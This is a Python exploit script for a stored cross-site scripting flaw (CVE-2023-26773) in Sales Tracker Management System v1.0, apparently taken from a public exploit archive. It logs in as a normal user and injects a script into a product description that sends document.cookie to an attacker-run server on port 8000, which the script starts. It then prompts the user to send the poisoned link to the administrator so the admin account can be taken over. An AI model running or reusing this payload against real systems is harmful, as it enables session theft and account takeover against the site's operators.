# Exploit Title: Sales Tracker Management System v1.0 - One click account takeover XSS
# Exploit Author: Achuth V P (retrymp3)
# Date: February 08, 2023
# CVE: CVE-2023-26773
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code
# Tested on: Ubuntu, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description: Sales Tracker Management System v1.0 suffers from XSS which results in one click account take over by stealing cookies.

import requests
from requests.auth import HTTPBasicAuth
import http.server
import socketserver
import argparse
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT


def expServer():
    Handler = http.server.SimpleHTTPRequestHandler
    PORT = 8000 #You can change.
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("serving at port", PORT)
        httpd.serve_forever()

def auth():
    print("Enter the username and password for a normal user")
    user=input("Username: ")
    passwd=input("Password: ")
    auth = HTTPBasicAuth(user, passwd)
    params = {'username': user, 'password': passwd}
    #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    #proxies=proxies give it as an argument to requests.get() to proxy it through burp.
    req=requests.post(url+'classes/Login.php?f=login',data=params)

def payL():
    tf=requests.post(url+'/classes/Master.php?f=save_product',
        files=(
            ('id', (None, '1')),
            ('code', (None, '123456')),
            ('name', (None, 'xssssssREssss')),
            ('description', (None, '<script>document.location="http://0.0.0.0:8000/?cookie="+document.cookie</script>')),
            ('price', (None, '355.19')),
            ('status', (None, '1'))
        )
    )
    if (tf):
        print("Send this to admin: "+FR+url+"admin/products/view_product.php?id=1"+FR+"\n")
        print(FC+"When admin clicks on the link you can see admin's cookie in the request log of the python server"+FY+"\n")
    else:
        print("Bad request. Check the url")

def bullet(char,color):
    C=FB if color == 'B' else FR if color == 'R' else FG
    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '


def sig():
    SIG  = SB+FY+"         "+FR+".-----..___.._____.      "+FY+"\n"
    SIG += FY+"         |  ..   >||__-__-_|         \n"
    SIG += FY+"         "+FR+"|  |.'  ,||_______          "+FY+"\n"
    SIG += FY+"         |    _ < ||__-__-_|"+FR+"*  *  *"+FY+" \n"
    SIG += FY+"         |  |\  \ ||__-__-_\n"
    SIG += FY+"         "+FR+"|___ \_ \||_______| "+FY+"\n"
    SIG += FY+"\n"+"    _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST
    return SIG

def argsetup():
    about  = SB+FT+'Admin account takeover - Sales Tracking Manager v1.0\n'+ST
    return about


if __name__ == "__main__":
    header = SB+FT+"\n"+'             '+FR+'retrymp3\n'+ST
    print(header)
    print(sig())
    print(argsetup())
    url=input("Enter the base url: ")
    auth()
    payL()
    expServer()